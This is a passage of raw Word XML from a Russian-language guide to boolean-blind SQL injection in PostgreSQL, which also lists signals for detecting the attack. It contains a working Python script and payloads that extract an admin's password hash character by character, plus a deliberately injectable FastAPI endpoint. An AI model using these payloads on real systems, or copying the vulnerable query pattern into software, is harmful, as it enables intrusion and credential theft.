          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если первый символ имеет ASCII &gt; 64: результат 1, продукт с id=1 в ответе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Иначе: результат 0, пустой ответ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Готовый алгоритм на стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import httpx</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def query_oracle(payload):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r = httpx.get(f"http://target/products/{payload}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return len(r.json()) &gt; 0</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def extract_char(position):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lo, hi = 0, 127</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    while lo &lt; hi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        mid = (lo + hi) // 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload = (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f"(SELECT CASE WHEN ascii(substring("</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f"(SELECT password_hash FROM users WHERE login='admin'), {position}, 1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            f")) &gt; {mid} THEN 1 ELSE 0 END)"</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        if query_oracle(payload):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            lo = mid + 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            hi = mid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return chr(lo)</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извлекает строку посимвольно за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7 * len(string)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-запросов. На bcrypt-хеш длиной 60 байт — порядка 420 запросов.</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Все три используемые функции — стандартные PG-функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(string, from, count)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает подстроку; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii(string)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает ASCII-код первого символа; для пустой строки — NULL. Бинарный поиск работает потому, что каждый запрос даёт один бит информации, что классически даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log₂(256) = 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запросов на байт.</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Application-роль должна иметь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на таблицу-источник. Возможность сделать сотни запросов. Тонкость с Unicode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PG возвращает Unicode codepoint первого символа. Для bcrypt-хешей и base64-токенов это нерелевантно.</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ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — повседневные SQL-функции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(&lt;subquery&gt;, N, 1)</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&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</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тысячи запросов одной формы, отличающихся только цифрой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substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и числом для сравнения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Самый яркий маркер boolean-blind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Запросы упорядочены так, что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монотонно растёт в коротком окне.</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3.3.1, 3.3.3, 3.2.3, 3.4.1.</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PortSwigger SQL injection cheat sheet — Conditional responses; HackTricks: PostgreSQL injection — Boolean based; PostgreSQL Documentation: String Functions and Operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.3 Row-count канал через tautology</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Когда инъекция попадает в булев контекст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напрямую, нет необходимости в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Достаточно дописать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND &lt;cond&gt;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OR &lt;cond&gt;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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</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@app.get("/users")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, login FROM users WHERE login = '{name}'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</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Базовый row-count oracle:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' AND (SELECT current_user) = 'app_user' --</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login FROM users WHERE login = 'admin' AND (SELECT current_user) = 'app_user' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие истинно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE login = 'admin' AND TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → возвращает запись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Условие ложно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE login = 'admin' AND FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → возвращает пусто.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Боевой пример — побитовое извлечение хеша:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' AND ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант с </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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nobody' OR (SELECT current_user) = 'app_user' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Истинно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE FALSE OR TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → возвращает все строки таблицы. Шумный oracle, но рабочий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ложно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE FALSE OR FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → пусто.</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Посимвольное извлечение без обёртки. Преимущества: короче payload, не нужны касты типов, применим в строковых контекстах. Недостатки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает все строки таблицы — может быть отрезан timeout-ом.</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Это та же булева алгебра, что в 3.3.1, но без посредника </w:t>
      </w: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PG-планировщик видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE A AND B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
